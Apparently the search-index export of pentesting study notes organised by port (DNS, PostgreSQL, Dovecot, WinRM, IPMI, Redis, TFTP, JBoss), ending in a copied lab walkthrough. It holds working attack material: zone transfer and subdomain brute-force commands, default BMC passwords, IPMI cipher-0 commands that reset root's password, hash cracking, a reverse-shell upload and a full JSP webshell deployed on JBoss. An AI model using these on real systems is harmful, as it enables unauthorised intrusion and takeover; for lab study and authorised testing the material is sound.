                        There are many different configuration types for DNS. All DNS servers work with three different types of configuration files:

                        1. local DNS configuration files
                        2. zone files
                        3. reverse name resolution files

                        The DNS server Bind9 is very often used on Linux-based distributions. Its local configuration file (named.conf) is roughly divided into two sections, firstly the options section for general settings and secondly the zone entries for the individual domains. The local configuration files are usually:

                        • /etc/bind/named.conf.local
                        • /etc/bind/named.conf.options
                        • /etc/bind/named.conf.log

                        In the file /etc/bind/named.conf.local we can define the different zones. A zone file is a text file that describes a DNS zone using the BIND file format; in other words, it is a point of delegation in the DNS tree. The BIND file format is the industry-preferred zone file format and is well established in DNS server software. A zone file describes a zone completely: there must be exactly one SOA record and at least one NS record. The SOA resource record is usually located at the beginning of a zone file. The main goal of these global rules is to improve the readability of zone files. A syntax error usually results in the entire zone file being considered unusable; the name server then behaves as if the zone did not exist and responds to DNS queries with a SERVFAIL error message.
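
                        As an illustrative sketch, a minimal BIND zone file for a hypothetical example.com zone (all names, addresses, and timers are made up):

                        $TTL 86400\n$ORIGIN example.com.\n@       IN  SOA ns1.example.com. admin.example.com. (\n            2024060801 ; serial\n            3600       ; refresh\n            1800       ; retry\n            604800     ; expire\n            86400 )    ; minimum TTL\n        IN  NS  ns1.example.com.\n        IN  MX  10 mail.example.com.\nns1     IN  A   10.129.14.128\nmail    IN  A   10.129.14.129\nwww     IN  CNAME example.com.\n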

                        DNS misconfigurations and vulnerabilities.

                        Option | Description
                        --- | ---
                        allow-query | Defines which hosts are allowed to send requests to the DNS server.
                        allow-recursion | Defines which hosts are allowed to send recursive requests to the DNS server.
                        allow-transfer | Defines which hosts are allowed to receive zone transfers from the DNS server.
                        zone-statistics | Collects statistical data of zones.
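
                        As a sketch of how such a misconfiguration looks, a hypothetical excerpt of /etc/bind/named.conf.options with an overly permissive transfer policy (see the zone transfer section below):

                        options {\n    allow-query { any; };      // anyone may query the server\n    allow-recursion { any; };  // open resolver\n    allow-transfer { any; };   // anyone may pull entire zone files (dig axfr)\n};\n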

                        A list of vulnerabilities targeting the BIND9 server can be found at CVEdetails. In addition, SecurityTrails provides a short list of the most popular attacks on DNS servers.

                        ","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#footprinting-dns","title":"Footprinting DNS","text":"

                        See nslookup.

                        # Query `A` records by submitting a domain name: default behaviour\nnslookup $TARGET\n\n# We can use the `-query` parameter to search specific resource records\n# Querying: A Records for a Subdomain\nnslookup -query=A $TARGET\n\n# Querying: PTR Records for an IP Address\nnslookup -query=PTR 31.13.92.36\n\n# Querying: ANY Existing Records\nnslookup -query=ANY $TARGET\n\n# Querying: TXT Records\nnslookup -query=TXT $TARGET\n\n# Querying: MX Records\nnslookup -query=MX $TARGET\n\n#  Specify a nameserver if needed by adding `@<nameserver/IP>` to the command\n

                        See dig.

                        # Querying: A records for a subdomain\ndig a www.example.com @$ip\n# here, $ip refers to the IP of the DNS server\n\n# Get the email of the domain administrator\ndig soa www.example.com\n# The email will contain a dot (.) instead of @\n\n# ENUMERATION\n# List the name servers known for the domain\ndig ns example.com @$ip\n# ns: name servers are published in NS records\n# the `@` character specifies the DNS server we want to query\n# here, $ip refers to the IP of the DNS server\n\n# View all available records\ndig any example.com @$ip\n# here, $ip refers to the IP of the DNS server. The more recent RFC 8482 specified that `ANY` DNS requests be abolished, so we may not receive a response to our `ANY` request.\n\n# Display the version: query a DNS server's version using a CHAOS class query of type TXT. This entry must exist on the DNS server.\ndig CH TXT version.bind @$ip\n\n# Querying: PTR records for an IP address\ndig -x $ip @1.1.1.1\n\n# Querying: TXT records\ndig txt example.com @$ip\n\n# Querying: MX records\ndig mx example.com @1.1.1.1\n

                        Transfer a zone (more on dig axfr)

                        dig axfr example.htb @$ip\n

                        If the administrator set the allow-transfer option to a whole subnet for testing purposes, or to any as a workaround, anyone can request the entire zone file from the DNS server.

                        Other tools for zone transfers:

                        Fierce:

                        # Perform a DNS zone transfer, falling back to a wordlist scan, against domain.com\nfierce -dns domain.com\n

                        dnsenum:

                        dnsenum domain.com\n# additionally it performs DNS brute force with /usr/share/dnsenum/dns.txt.\n
                        ","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#subdomain-brute-enumeration","title":"Subdomain brute enumeration","text":"

                        Using a SecLists wordlist:

                        for sub in $(cat /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.example.com @$ip | grep -v ';\\|SOA' | sed -r '/^\\s*$/d' | grep $sub | tee -a subdomains.txt;done\n
                        ","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#tools-for-passive-enumeration","title":"Tools for passive enumeration","text":"Tool + Cheat sheet What it does Google dorks Google hacking, also named Google dorking, is a hacker technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites are using. Sublist3r Sublist3r enumerates subdomains using many search engines such as Google, Yahoo, Bing, Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft, Virustotal, ThreatCrowd, DNSdumpster and ReverseDNS. crt.sh It collects information about SSL certificates. If you visit a domain and it contains a certificate you can extract other subdomain by using the View Certificate functionality. dnscan Python wordlist-based DNS subdomain scanner. DNSRecon Preinstalled with Linux: dsnrecon is a simple python script that enables to gather DNS-oriented information on a given target. dnsdumpster.com DNSdumpster.com is a FREE domain research tool that can discover hosts related to a domain. Finding visible hosts from the attackers perspective is an important part of the security assessment process.","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#tools-for-active-enumeration","title":"Tools for active enumeration","text":"Tool + Cheat sheet What it does dnsenum multithreaded perl script to enumerate DNS information of a domain and to discover non-contiguous ip blocks. dig discover non-contiguous ip blocks. fierce DNS scanner that helps locate non-contiguous IP space and hostnames. dnscan Python wordlist-based DNS subdomain scanner. gobuster For brute force enumerations. nslookup . amass In depth DNS Enumeration and network mapping.","tags":["scanning","domain","subdomain","pentesting"]},{"location":"5432-postgresql/","title":"5432 postgreSQL","text":"

                        https://book.hacktricks.xyz/network-services-pentesting/pentesting-postgresql.

                        ","tags":["postgresql","port 5432"]},{"location":"5432-postgresql/#description","title":"Description","text":"

                        The service that runs on TCP port 5432 is typically PostgreSQL, a database management system used for creating, modifying, and updating databases, changing and adding data, and more. PostgreSQL can typically be interacted with using a command-line tool called psql.

                        psql\n
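
                        If the port is exposed directly, a plain connection attempt is a quick first check; the postgres superuser account is a common first guess (credentials hypothetical):

                        psql -h $ip -p 5432 -U postgres\n# \\l lists databases once connected; \\q quits\n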
                        ","tags":["postgresql","port 5432"]},{"location":"5432-postgresql/#installation","title":"Installation","text":"","tags":["postgresql","port 5432"]},{"location":"5432-postgresql/#linux","title":"Linux","text":"

                        If the tool is not installed, then run:

                        sudo apt install postgresql-client-common\n

                        If your user is not in the sudoers file on the target, there are a few possible workarounds:

                        • uploading static binaries onto the target machine,
                        • port forwarding or tunneling using SSH.

                        Using SSH and postgresql:

                        1. On the attacking machine:

                        ssh UserNameInTheAttackedMachine@IPOfTheAttackedMachine -L 1234:localhost:5432 \n# We listen for incoming connections on our local port 1234. When a client connects to it, the SSH client forwards the connection through the tunnel to port 5432 on the remote server, so the local client can use the remote PostgreSQL service as if it were running on the local machine.\n# In the -L option, the port to the left of localhost (1234) is our local listening port, and the one to the right (5432) is the target port on the remote server, where PostgreSQL is listening.\n

                        2. In another terminal on the attacking machine:

                        sudo apt update && sudo apt install postgresql postgresql-client-common \n# this will install postgresql in case you don't have it.\n\npsql -U christine -h localhost -p 1234\n# Using our installation of psql, we can now interact with the PostgreSQL service running on the target machine through the tunnel:\n# -U: specify the user.\n# -h: specify the host (localhost).\n# -p 1234: the local port our SSH tunnel from earlier is listening on.\n
                        ","tags":["postgresql","port 5432"]},{"location":"5432-postgresql/#powershell","title":"Powershell","text":"
                        Install-Module PostgreSQLCmdlets\n
                        ","tags":["postgresql","port 5432"]},{"location":"5432-postgresql/#basics-commands-in-postgresql","title":"Basics commands in postgresql","text":"
                        # List databases\n# Short version: \\l\n\\list\n\n# Connect to a database\n# Short version: \\c NameOfDataBase\n\\connect NameOfDatabase\n\n# List database tables (once you have selected a database)\n\\dt\n\n# Dump the contents of a table\nSELECT * FROM NameOfTable;\n# Watch out! Case sensitive\n
                        ","tags":["postgresql","port 5432"]},{"location":"55007-55008-dovecot/","title":"55007 - 55008 dovecot","text":"","tags":["dovecot","port 55007","port 55008"]},{"location":"55007-55008-dovecot/#dovecot","title":"dovecot","text":"

                        You can connect to a Dovecot server using the telnet protocol.

                        telnet IP port\n# Example: telnet 192.168.56.101 55007\n
                        ","tags":["dovecot","port 55007","port 55008"]},{"location":"55007-55008-dovecot/#basic-commands","title":"Basic commands","text":"
                        # Enter the username to log in\nUSER username\n\n# Enter the password\nPASS secretword\n\n# Now you are logged in and can list the messages on the server for that user\nLIST\n\n# Read a message using its id (the id is a number)\nRETR id\n\n# You might be able to delete messages\nDELE id\n
                        ","tags":["dovecot","port 55007","port 55008"]},{"location":"5985-5986-winrm-windows-remote-management/","title":"Port 5985, 5986 - WinRM - Windows Remote Management","text":"

                        How is WinRM different from Remote Desktop (RDP)? WinRM is a protocol for remote management, while Remote Desktop (RDP) is a protocol for remote desktop access. WinRM allows for remote execution of management commands, while RDP provides a graphical interface for remote desktop access.

                        WinRM is part of the operating system. However, to obtain data from remote computers, you must configure a WinRM listener.

                        WinRM is a network protocol based on XML web services that uses the Simple Object Access Protocol (SOAP) for the remote management of Windows systems and for establishing connections to remote hosts and their applications. It handles the communication between Web-Based Enterprise Management (WBEM) and the Windows Management Instrumentation (WMI), which can call the Distributed Component Object Model (DCOM). For security reasons, WinRM must be activated and configured manually in Windows 10. WinRM uses TCP ports 5985 (HTTP) and 5986 (HTTPS).

                        Another component that fits WinRM for administration is Windows Remote Shell (WinRS), which lets us execute arbitrary commands on the remote system. The program is even included on Windows 7 by default.

                        ","tags":["tools","port 5985","port 5986","winrm"]},{"location":"5985-5986-winrm-windows-remote-management/#footprinting-winrm","title":"Footprinting winrm","text":"

                        As we already know, WinRM uses TCP ports 5985 (HTTP) and 5986 (HTTPS) by default, which we can scan using Nmap:

                        nmap -sV -sC $ip -p5985,5986 --disable-arp-ping -n\n

                        We'll connect to the WinRM service on the target and try to get a session. Because PowerShell isn't installed on Linux by default, we'll use a tool called Evil-WinRM, which is made for this kind of scenario.

                        evil-winrm -i $ip -u <username> -p <password>\n

                        On Windows, we can use the Test-WSMan cmdlet.
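
                        A minimal check from a Windows host might look like this; Test-WSMan returns the WSMan protocol version when a listener is reachable:

                        Test-WSMan -ComputerName $ip\n# add -UseSSL to test the HTTPS listener on port 5986 instead of 5985\n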

                        ","tags":["tools","port 5985","port 5986","winrm"]},{"location":"623-intelligent-platform-management-interface-ipmi/","title":"623 - Intelligent Platform Management Interface (IPMI)","text":"

                        Intelligent Platform Management Interface (IPMI) is a system management tool that provides sysadmins with the ability to manage and monitor systems even if they are powered off or in an unresponsive state. It operates using a direct network connection to the system's hardware and does not require access to the operating system via a login shell. IPMI can also be used for remote upgrades to systems without requiring physical access to the target host. IPMI communicates over port 623 UDP. IPMI is typically used in three ways:

                        • Before the OS has booted to modify BIOS settings
                        • When the host is fully powered down
                        • Access to a host after a system failure
                        ","tags":["intelligent platform management interface","port 623","ipmi","bcm"]},{"location":"623-intelligent-platform-management-interface-ipmi/#footprinting-ipmi","title":"Footprinting ipmi","text":"

                        Many Baseboard Management Controllers (BMCs) (including HP iLO, Dell DRAC, and Supermicro IPMI) expose a web-based management console, some sort of command-line remote access protocol such as Telnet or SSH, and the port 623 UDP, which, again, is for the IPMI network protocol.

                        ","tags":["intelligent platform management interface","port 623","ipmi","bcm"]},{"location":"623-intelligent-platform-management-interface-ipmi/#discovery","title":"Discovery","text":"
                        nmap -n -p 623 10.0.0.0/24\nnmap -n -sU -p 623 10.0.0.0/24\nuse auxiliary/scanner/ipmi/ipmi_version\n
                        ","tags":["intelligent platform management interface","port 623","ipmi","bcm"]},{"location":"623-intelligent-platform-management-interface-ipmi/#version","title":"Version","text":"
                         sudo nmap -sU --script ipmi-version -p 623 <hostname/IP>\n

                        Metasploit scanner module IPMI Information Discovery (auxiliary/scanner/ipmi/ipmi_version): this module discovers host information through IPMI Channel Auth probes:

                        use auxiliary/scanner/ipmi/ipmi_version\n\nshow actions\nset ACTION <action-name>\nshow options\n# set needed options\nrun\n

                        We might find BMCs where the administrators have not changed the default password:

                        Product | Username | Password
                        --- | --- | ---
                        Dell Remote Access Card (iDRAC, DRAC) | root | calvin
                        HP Integrated Lights Out (iLO) | Administrator | randomized 8-character string consisting of numbers and uppercase letters
                        Supermicro IPMI (2.0) | ADMIN | ADMIN
                        IBM Integrated Management Module (IMM) | USERID | PASSW0RD (with a zero)
                        Fujitsu Integrated Remote Management Controller | admin | admin
                        Oracle/Sun Integrated Lights Out Manager (ILOM) | root | changeme
                        ASUS iKVM BMC | admin | admin

                        These default passwords may gain us access to the web console or even command line access via SSH or Telnet.
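
                        As a quick sketch, the defaults from the table above can be tested with ipmitool once it is installed (Supermicro values shown; the command only succeeds with valid credentials):

                        ipmitool -I lanplus -H $ip -U ADMIN -P ADMIN chassis status\n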

                        ","tags":["intelligent platform management interface","port 623","ipmi","bcm"]},{"location":"623-intelligent-platform-management-interface-ipmi/#vulnerability-ipmi-authentication-bypass-via-cipher-0","title":"Vulnerability - IPMI Authentication Bypass via Cipher 0","text":"

                        Dan Farmer identified a serious failing of the IPMI 2.0 specification, namely that cipher type 0, an indicator that the client wants to use clear-text authentication, actually allows access with any password. Cipher 0 issues were identified in HP, Dell, and Supermicro BMCs, with the issue likely encompassing all IPMI 2.0 implementations.

                        use auxiliary/scanner/ipmi/ipmi_cipher_zero\n

                        Abuse this flaw with ipmitool:

                        # Install\napt-get install ipmitool \n\n# Use Cipher 0 to dump a list of users. With -C 0 any password is accepted\nipmitool -I lanplus -C 0 -H $ip -U root -P root user list \n\n# Change the password of root\nipmitool -I lanplus -C 0 -H $ip -U root -P root user set password 2 abc123 \n
                        ","tags":["intelligent platform management interface","port 623","ipmi","bcm"]},{"location":"623-intelligent-platform-management-interface-ipmi/#ipmi-20-rakp-remote-sha1-password-hash-retrieval","title":"IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval","text":"

                        If default credentials do not work to access a BMC, we can turn to a flaw in the RAKP protocol in IPMI 2.0. During the authentication process, the server sends a salted SHA1 or MD5 hash of the user's password to the client before authentication takes place.

                        Metasploit module:

                        This module identifies IPMI 2.0-compatible systems and attempts to retrieve the HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb in the tools subdirectory, as well as with hashcat (CPU) 0.46 or newer using hash type 7300.

                        use auxiliary/scanner/ipmi/ipmi_dumphashes\n\nshow actions\n\nset ACTION < action-name >\n\nshow options\n# set <options>\n\nrun\n

                        Hashcat:

                        # -m 7300: IPMI2 RAKP HMAC-SHA1 hash mode\n# -a 3: mask attack; -1 ?d?u defines custom charset 1 (digits and uppercase letters)\n# ?1x8 matches the HP iLO factory default of an 8-character digits/uppercase password\nhashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u\n
                        ","tags":["intelligent platform management interface","port 623","ipmi","bcm"]},{"location":"623-intelligent-platform-management-interface-ipmi/#how-does-ipmi-work","title":"How does IPMI work","text":"

                        IPMI can monitor a range of different things such as system temperature, voltage, fan status, and power supplies. It can also be used for querying inventory information, reviewing hardware logs, and alerting using SNMP. The host system can be powered off, but the IPMI module requires a power source and a LAN connection to work correctly.

                        Systems using IPMI version 2.0 can be administered via serial over LAN, giving sysadmins the ability to view serial console output in band. To function, IPMI requires the following components:

                        • Baseboard Management Controller (BMC) - A micro-controller and essential component of an IPMI
                        • Intelligent Chassis Management Bus (ICMB) - An interface that permits communication from one chassis to another
                        • Intelligent Platform Management Bus (IPMB) - extends the BMC
                        • IPMI Memory - stores things such as the system event log, repository store data, and more
                        • Communications Interfaces - local system interfaces, serial and LAN interfaces, ICMB and PCI Management Bus.

                        Baseboard Management Controllers (BMCs) are the embedded systems that implement the IPMI protocol.

                        BMCs are built into many motherboards but can also be added to a system as a PCI card. Most servers either come with a BMC or support adding a BMC. The most common BMCs we often see during internal penetration tests are HP iLO, Dell DRAC, and Supermicro IPMI.

                        If we can access a BMC during an assessment, we would gain full access to the host motherboard and be able to monitor, reboot, power off, or even reinstall the host operating system. Gaining access to a BMC is nearly equivalent to physical access to a system.

                        ","tags":["intelligent platform management interface","port 623","ipmi","bcm"]},{"location":"623-intelligent-platform-management-interface-ipmi/#resources","title":"Resources","text":"
                        • hacktricks: https://book.hacktricks.xyz/network-services-pentesting/623-udp-ipmi
                        ","tags":["intelligent platform management interface","port 623","ipmi","bcm"]},{"location":"6379-redis/","title":"6379 redis","text":"","tags":["redis","port 6379"]},{"location":"6379-redis/#description","title":"Description","text":"

                        Redis (REmote DIctionary Server) is an open-source, in-memory NoSQL key-value data store used as a database, cache, and message broker; it popularized the idea of a system that can be considered a store and a cache at the same time. The Redis command line interface (redis-cli) is a terminal program used to send commands to and read replies from the Redis server. Whether you've installed Redis locally or you're working with a remote instance, you need to connect to it in order to perform most operations.

                        ","tags":["redis","port 6379"]},{"location":"6379-redis/#the-server","title":"The server","text":"

                        Redis runs as server-side software so its core functionality is in its server component. The server listens for connections from clients, programmatically or through the command-line interface.

                        ","tags":["redis","port 6379"]},{"location":"6379-redis/#the-cli","title":"The CLI","text":"

                        The command-line interface (CLI) is a powerful tool that gives you complete access to Redis's data and functionality, which is useful if you are developing software or a tool that needs to interact with it.

                        ","tags":["redis","port 6379"]},{"location":"6379-redis/#database","title":"Database","text":"

                        The database is stored in the server's RAM to enable fast data access. Redis also writes the contents of the database to disk at varying intervals to persist it as a backup, in case of failure.

                        ","tags":["redis","port 6379"]},{"location":"6379-redis/#install-redis-in-your-kali","title":"Install redis in your kali","text":"","tags":["redis","port 6379"]},{"location":"6379-redis/#prerequisites","title":"Prerequisites","text":"

                        If you're running a very minimal distribution (such as a Docker container) you may need to install lsb-release first:

                        sudo apt install lsb-release\n

                        Add the repository to the apt index, update it, and then install:

                        curl -fsSL https://packages.redis.io/gpg | sudo gpg --dearmor -o /usr/share/keyrings/redis-archive-keyring.gpg\n\necho \"deb [signed-by=/usr/share/keyrings/redis-archive-keyring.gpg] https://packages.redis.io/deb $(lsb_release -cs) main\" | sudo tee /etc/apt/sources.list.d/redis.list\n\nsudo apt-get update\n\nsudo apt-get install redis\n
                        ","tags":["redis","port 6379"]},{"location":"6379-redis/#to-connect-to-a-terminal","title":"To connect to a terminal","text":"

                        The first thing to know is that you can use telnet (usually on the Redis default port, 6379):

                        telnet localhost 6379\n

                        If you have redis-server installed locally, you can connect to the Redis instance with the redis-cli command.

                        If you want to connect to a remote Redis datastore, you can specify its host and port numbers with the -h and -p flags, respectively. Also, if you\u2019ve configured your Redis database to require a password, you can include the -a flag followed by your password in order to authenticate:

                        redis-cli -h host -p port_number -a password\n

                        If you\u2019ve set a Redis password, clients will be able to connect to Redis even if they don\u2019t include the -a flag in their redis-cli command. However, they won\u2019t be able to add, change, or query data until they authenticate. To authenticate after connecting, use the auth command followed by the password:

                        auth password\n

                        If the password passed to auth is valid, the command will return OK. Otherwise, it will return an error.

                        redis-cli -h 10.129.124.88\n

                        Upon a successful connection with the Redis server, we should see a prompt in the terminal like:

                        IP:6379>\n

                        One of the basic Redis enumeration commands is info which returns information and statistics about the Redis server.
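
                        For example (prompt and output illustrative, trimmed to the interesting sections):

                        IP:6379> info\n# Server   -> redis_version, os, process id\n# Keyspace -> db0:keys=4,expires=0,avg_ttl=0\n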

                        ","tags":["redis","port 6379"]},{"location":"6379-redis/#dumping-database","title":"Dumping Database","text":"

                        Inside Redis, databases are identified by numbers starting from 0. You can see which ones are in use in the output of the info command, under the "Keyspace" section:

                        # Keyspace\ndb0:keys=4, expires=0, avg_ttl=0\ndb1:keys=2, expires=0, avg_ttl=0\n

                        Or you can just get all the keyspaces (databases) with:

                        INFO keyspace\n

                        Redis has a concept of separated namespaces called \u201cdatabases\u201d. You can select the database number you want to use with \u201cSELECT\u201d. By default the database with index 0 is used.

                        # Select database\nredis 127.0.0.1:6379> SELECT 1\n\n# To see all keys in a given database. First, you enter in it with \"SELECT <number>\" and then\nredis 127.0.0.1:6379> keys *\n\n# To retrieve a specific key\nredis 127.0.0.1:6379> get flag\n
                        ","tags":["redis","port 6379"]},{"location":"6653-openflow/","title":"6653 Openflow","text":"

                        The OpenFlow protocol operates over TCP, with a default port number of 6653. This protocol operates between an SDN controller and an SDN-controlled switch or other device implementing the OpenFlow API.
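
                        A quick, hedged service check against an SDN controller, scanning the default port plus the legacy 6633:

                        nmap -sV -p 6633,6653 $ip\n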

                        ","tags":["Openflow","port 6653"]},{"location":"69-tftp/","title":"69 - ftpt","text":"

                        Trivial File Transfer Protocol (TFTP) uses UDP port 69 and requires no authentication\u2014clients read from, and write to servers using the datagram format outlined in RFC 1350. Due to deficiencies within the protocol (namely lack of authentication and no transport security), it is uncommon to find servers on the public Internet. Within large internal networks, however, TFTP is used to serve configuration files and ROM images to VoIP handsets and other devices.

                        You can spot the open port with a UDP scan. Additionally, when reading /etc/passwd you might find a tftp service user.

                        Trivial File Transfer Protocol (TFTP) is a simple protocol that provides basic file transfer function with no user authentication. TFTP is intended for applications that do not need the sophisticated interactions that File Transfer Protocol (FTP) provides.

                        UDP provides a mechanism to detect corrupt data in packets, but it does not attempt to solve other problems that arise with packets, such as lost or out-of-order packets. It is implemented in the transport layer of the OSI model and is known as a fast but unreliable protocol, unlike TCP, which is reliable but slower than UDP. Just as TCP has well-known ports for protocols such as HTTP, FTP, and SSH, UDP has its own ports for the protocols that run over it.

                        ","tags":["pentesting"]},{"location":"69-tftp/#enumeration","title":"Enumeration","text":"
                        nmap -n -Pn -sU -p69 -sV --script tftp-enum $ip\n
                        ","tags":["pentesting"]},{"location":"69-tftp/#exploitation","title":"Exploitation","text":"

                        You can use Metasploit or Python to check if you can download/upload files:

                        Module: auxiliary/admin/tftp/tftp_transfer_util

                        You can also exploit it manually. Install a TFTP client:

                        # Installing a tftp server\nsudo apt-get install tftpd-hpa\n\n# Installing a tftp client\nsudo apt install tftp\n

                        For available commands:

                        man tftp\n

                        Upload your pentestmonkey shell with:

                        put pentestmonkey.php\n

                        Where does it get uploaded? It depends, but the default configuration file for tftpd-hpa is /etc/default/tftpd-hpa, and the upload directory is set there by the TFTP_DIRECTORY parameter. With that information, you can browse to the directory and launch your reverse shell from there.
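
                        For example, on a host running tftpd-hpa, the upload directory can be read straight from that config file (directory value illustrative; /var/lib/tftpboot is a common default):

                        grep TFTP_DIRECTORY /etc/default/tftpd-hpa\n# TFTP_DIRECTORY=\"/var/lib/tftpboot\"\n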

                        ","tags":["pentesting"]},{"location":"69-tftp/#related-labs","title":"Related labs","text":"

                        HackTheBox machine: included.

                        ","tags":["pentesting"]},{"location":"7z/","title":"7z","text":""},{"location":"7z/#installation","title":"Installation","text":"
                        sudo apt install p7zip-full\n
                        "},{"location":"7z/#basic-usage","title":"Basic usage","text":"
                        # Extract file\n7z x ~/archive.7z\n\n# a : Add files to archive\n# b : Benchmark\n# d : Delete files from archive\n# e : Extract files from archive (without using directory names)\n# h : Calculate hash values for files\n# i : Show information about supported formats\n# l : List contents of archive\n# rn : Rename files in archive\n# t : Test integrity of archive\n# u : Update files to archive\n# x : eXtract files with full paths\n
                        "},{"location":"8080-jboss/","title":"8080 JBoss AS Instance 6.1.0","text":"

                        Copied from INE lab: HTML Adapter to Root

                        Step 1:\u00a0Open the lab link to access the Kali GUI instance.

                        Step 2:\u00a0Check if the provided machine/domain is reachable.

                        Command:

                        ping -c3 demo.ine.local\n

                        The provided machine is reachable.

                        Step 3:\u00a0Check open ports on the provided machine.

                        Command:

                        nmap -sS -sV demo.ine.local\n

                        Multiple ports are open on the target machine.

                        Some notable services include Java RMI, Apache Tomcat, and the JBoss application server.

                        What is Java RMI?

                        The Java Remote Method Invocation (RMI) system allows an object running in one Java virtual machine to invoke methods on an object running in another Java virtual machine. RMI provides for remote communication between programs written in the Java programming language.

                        Reference:\u00a0https://docs.oracle.com/javase/tutorial/rmi/index.html

                        What is Apache Tomcat?

                        Apache Tomcat is a free and open-source implementation of the Jakarta Servlet, Jakarta Expression Language, and WebSocket technologies. It provides a \"pure Java\" HTTP web server environment in which Java code can run.

                        Reference:\u00a0https://en.wikipedia.org/wiki/Apache_Tomcat

                        What is JBoss application server?

                        JBoss application server is an open-source platform, developed by Red Hat, used for implementing Java applications and a wide variety of other software applications. You can build and deploy Java services to be scaled to fit the size of your business.

                        Reference:\u00a0https://www.dnsstuff.com/what-is-jboss-application-server

                        Step 4:\u00a0Check the application served by Apache Tomcat.

                        Open the following URL in the browser:

                        URL:\u00a0http://demo.ine.local:8080

                        Notice that the target is serving the JBoss application server (version 6.1.0).

                        Step 5:\u00a0Access the JMX console.

                        Click on the\u00a0JMX Console\u00a0link:

                        What is JMX?

                        Java Management Extensions (JMX) is a Java technology that supplies tools for managing and monitoring applications, system objects, devices (such as printers) and service-oriented networks. Those resources are represented by objects called MBeans (for Managed Bean).

                        Reference:\u00a0https://en.wikipedia.org/wiki/Java_Management_Extensions

                        Using the JMX console, we can manage the application and, therefore, alter it to execute malicious code on the target server and gain remote code execution.

                        What is an MBean?

                        An MBean is a managed Java object, similar to a JavaBeans component, that follows the design patterns set forth in the JMX specification. An MBean can represent a device, an application, or any resource that needs to be managed.

                        Reference:\u00a0https://docs.oracle.com/javase/tutorial/jmx/mbeans/index.html

                        Once the JMX Console is clicked, you should be presented with an authentication dialog:

                        Searching online for the default credentials for JBoss:

                        Click on the\u00a0StackOverflow link\u00a0from the results:

                        The default credentials for JBoss web console are:

                        Username:\u00a0admin Password:\u00a0admin

                        Submit these credentials to the authentication dialog:

                        The above credentials were accepted, and the login was successful!

                        You should have access to the\u00a0JMX Agent View\u00a0page now.

                        Using this page, one can manage the deployed applications and even alter them.

                        Step 6:\u00a0Search for the\u00a0MainDeployer\u00a0(JBoss System API).

                        Apply the following filter:

                        Filter:

                        jboss.system*\n

                        Select the entry for\u00a0MainDeployer.

                        Information:\u00a0The MainDeployer service can be used to manage deployments on the JBoss application server. For that reason, this API is quite crucial from a pentester's perspective.

                        Once the\u00a0MainDeployer\u00a0service is selected, you should see the following page:

                        Scroll down to the\u00a0redeploy\u00a0attribute. Make sure the\u00a0redeploy\u00a0attribute accepts a URL as the input (java.net.URL):

                        We will be invoking this method to deploy a malicious JSP application, one that gives us a webshell.

                        Step 7:\u00a0Prepare the payload for deployment.

                        Head over to the following URL:

                        URL:\u00a0https://github.com/fuzzdb-project/fuzzdb/blob/master/web-backdoors/jsp/cmd.jsp

                        Open the code in raw form (click the\u00a0Raw\u00a0button):

                        Copy the raw payload content and save it as backdoor.jsp:

                        <%@ page import=\"java.util.*,java.io.*\"%>\n<%\n//\n// JSP_KIT\n//\n// cmd.jsp = Command Execution (unix)\n//\n// by: Unknown\n// modified: 27/06/2003\n//\n%>\n<HTML><BODY>\n<FORM METHOD=\"GET\" NAME=\"myform\" ACTION=\"\">\n<INPUT TYPE=\"text\" NAME=\"cmd\">\n<INPUT TYPE=\"submit\" VALUE=\"Send\">\n</FORM>\n<pre>\n<%\nif (request.getParameter(\"cmd\") != null) {\n    out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");\n    Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n    OutputStream os = p.getOutputStream();\n    InputStream in = p.getInputStream();\n    DataInputStream dis = new DataInputStream(in);\n    String disr = dis.readLine();\n    while ( disr != null ) {\n        out.println(disr); \n        disr = dis.readLine(); \n        }\n    }\n%>\n</pre>\n</BODY></HTML>\n

                        If the GET request contains the\u00a0cmd\u00a0parameter, the specified command is executed, and the results are displayed on the web page.

                        Generate a WAR (Web Application Resource or Web application ARchive) file for deployment:

                        Commands:

                        jar -cvf backdoor.war backdoor.jsp\nfile backdoor.war\n

                        The payload application is generated.

                        Step 8:\u00a0Deploy the payload application on the target server.

                        Check the IP address of the attacker machine:

                        Command:

                        ip addr\n

                        The IP address of the attacker machine is\u00a0192.166.140.2.

                        Note:\u00a0The IP addresses assigned to the labs are bound to change with every lab run. Kindly replace the IP addresses in the subsequent commands with the one assigned to your attacker machine. Failing to do that would result in failed exploitation attempts.

                        Start a Python-based HTTP server to serve the payload application:

                        Command:

                        python3 -m http.server 80\n

                        Head over to the JMX Console page and under the\u00a0redeploy\u00a0attribute, place the following URL as the parameter:

                        URL:

                        http://192.166.140.2/backdoor.war\n

                        Note:\u00a0Kindly make sure to substitute the correct IP address in the above URL.

                        Once the payload application URL is specified, click on the\u00a0Invoke\u00a0button:

                        The operation was successful, as shown in the above image!

                        Check the terminal where the Python-based HTTP server was running:

                        Notice that there is a request from the target machine for the\u00a0backdoor.war\u00a0file.

                        Step 9:\u00a0Access the webshell and run OS commands.

                        Visit the following URL:

                        URL:

                        http://demo.ine.local:8080/backdoor/backdoor.jsp\n

                        There is a simple webshell.

                        Send the\u00a0id\u00a0command:

                        We are running as\u00a0root!
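
                        Since the webshell reads the cmd GET parameter, the same commands can also be issued from the attacker terminal with curl (URL-encode commands containing spaces):

                        curl \"http://demo.ine.local:8080/backdoor/backdoor.jsp?cmd=id\"\n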

                        Send the\u00a0pwd\u00a0command:

                        List the files in the current directory (ls -al):

                        That was all for this lab on abusing a misconfigured JBoss application server to access the JMX console (default credentials) and leveraging it to deploy a webshell.

                        To summarize, we performed recon on the target machine to determine the presence of JBoss AS. We found that the JMX console accepted default credentials and leveraged it to deploy a malicious application to execute arbitrary commands on the target server as root.

                        ","tags":["jboss","port 8080"]},{"location":"873-rsync/","title":"873 rsync","text":"","tags":["rsync","port 873"]},{"location":"873-rsync/#description","title":"Description","text":"

